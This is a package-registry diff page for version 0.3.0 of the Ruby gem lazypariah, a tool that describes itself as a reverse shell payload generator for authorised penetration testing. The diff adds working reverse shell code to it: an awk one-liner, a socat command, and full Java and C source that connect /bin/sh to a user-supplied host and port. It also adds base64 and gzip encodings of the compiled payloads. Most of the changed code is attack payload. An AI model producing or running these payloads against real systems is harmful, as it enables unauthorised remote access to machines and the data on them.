lazypariah 0.2.0 → 0.3.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of lazypariah might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/lazypariah +84 -3
- metadata +4 -3
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
|
4
|
+
data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
|
7
|
+
data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532
|
data/bin/lazypariah
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
#
|
3
3
|
# Title: LAZYPARIAH
|
4
|
-
# Version: 0.
|
4
|
+
# Version: 0.3.0
|
5
5
|
# Description:
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
@@ -24,10 +24,12 @@
|
|
24
24
|
require "base64"
|
25
25
|
require "optparse"
|
26
26
|
require "erb"
|
27
|
+
require "zlib"
|
28
|
+
require "stringio"
|
27
29
|
|
28
30
|
# Define constants.
|
29
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
30
|
-
PROGRAM_VERSION = "0.
|
32
|
+
PROGRAM_VERSION = "0.3.0".freeze()
|
31
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
32
34
|
|
33
35
|
# Define payload list.
|
@@ -58,7 +60,16 @@ PAYLOAD_LIST = [
|
|
58
60
|
"ruby",
|
59
61
|
"ruby_c",
|
60
62
|
"ruby_b64",
|
61
|
-
"bash_tcp"
|
63
|
+
"bash_tcp",
|
64
|
+
"awk",
|
65
|
+
"socat",
|
66
|
+
"java_class_binary",
|
67
|
+
"java_class_b64",
|
68
|
+
"java_class_gzip_b64",
|
69
|
+
"c_binary",
|
70
|
+
"c_binary_b64",
|
71
|
+
"c_binary_gzip",
|
72
|
+
"c_binary_gzip_b64"
|
62
73
|
].sort()
|
63
74
|
|
64
75
|
# Define function for displaying program information.
|
@@ -202,6 +213,76 @@ begin
|
|
202
213
|
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
203
214
|
when "bash_tcp"
|
204
215
|
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
216
|
+
when "awk"
|
217
|
+
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
|
218
|
+
when "socat"
|
219
|
+
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
|
220
|
+
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
|
221
|
+
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
222
|
+
|
223
|
+
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
224
|
+
temp_file = temp_dir+"/rs.java"
|
225
|
+
|
226
|
+
system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
|
227
|
+
|
228
|
+
File.open(temp_dir+"/rs.class", "r") do |f|
|
229
|
+
java_payload = f.read()
|
230
|
+
case ARGV[0]
|
231
|
+
when "java_class_binary"
|
232
|
+
print_output(java_payload)
|
233
|
+
when "java_class_b64"
|
234
|
+
java_payload_b64 = Base64.strict_encode64(java_payload)
|
235
|
+
print_output(java_payload_b64, url_encode=url_encode)
|
236
|
+
when "java_class_gzip_b64"
|
237
|
+
sio = StringIO.new()
|
238
|
+
sio.binmode()
|
239
|
+
gz = Zlib::GzipWriter.new(sio)
|
240
|
+
gz.write(java_payload)
|
241
|
+
gz.close()
|
242
|
+
java_payload_gzip = sio.string
|
243
|
+
java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
|
244
|
+
print_output(java_payload_gzip_b64, url_encode=url_encode)
|
245
|
+
end
|
246
|
+
end
|
247
|
+
|
248
|
+
system("rm -r #{temp_dir}")
|
249
|
+
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
|
250
|
+
code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
|
251
|
+
|
252
|
+
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
253
|
+
temp_file = temp_dir+"/rs.c"
|
254
|
+
|
255
|
+
system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
|
256
|
+
|
257
|
+
File.open(temp_dir+"/rs", "r") do |f|
|
258
|
+
binary_payload = f.read()
|
259
|
+
case ARGV[0]
|
260
|
+
when "c_binary"
|
261
|
+
print_output(binary_payload)
|
262
|
+
when "c_binary_b64"
|
263
|
+
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
264
|
+
print_output(binary_payload_b64)
|
265
|
+
when "c_binary_gzip"
|
266
|
+
sio = StringIO.new()
|
267
|
+
sio.binmode()
|
268
|
+
gz = Zlib::GzipWriter.new(sio)
|
269
|
+
gz.write(binary_payload)
|
270
|
+
gz.close()
|
271
|
+
binary_payload_gzip = sio.string
|
272
|
+
print_output(binary_payload_gzip, url_encode)
|
273
|
+
when "c_binary_gzip_b64"
|
274
|
+
sio = StringIO.new()
|
275
|
+
sio.binmode()
|
276
|
+
gz = Zlib::GzipWriter.new(sio)
|
277
|
+
gz.write(binary_payload)
|
278
|
+
gz.close()
|
279
|
+
binary_payload_gzip = sio.string
|
280
|
+
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
281
|
+
print_output(binary_payload_gzip_b64, url_encode=url_encode)
|
282
|
+
end
|
283
|
+
end
|
284
|
+
|
285
|
+
system("rm -r #{temp_dir}")
|
205
286
|
end
|
206
287
|
end
|
207
288
|
end
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: lazypariah
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.3.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Peter Funnell
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2020-11-
|
11
|
+
date: 2020-11-23 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|
@@ -42,7 +42,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
42
42
|
- !ruby/object:Gem::Version
|
43
43
|
version: '0'
|
44
44
|
requirements:
|
45
|
-
- A GNU/Linux or BSD operating system.
|
45
|
+
- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
|
46
|
+
and OpenJDK (for Java payloads).
|
46
47
|
rubygems_version: 3.1.2
|
47
48
|
signing_key:
|
48
49
|
specification_version: 4
|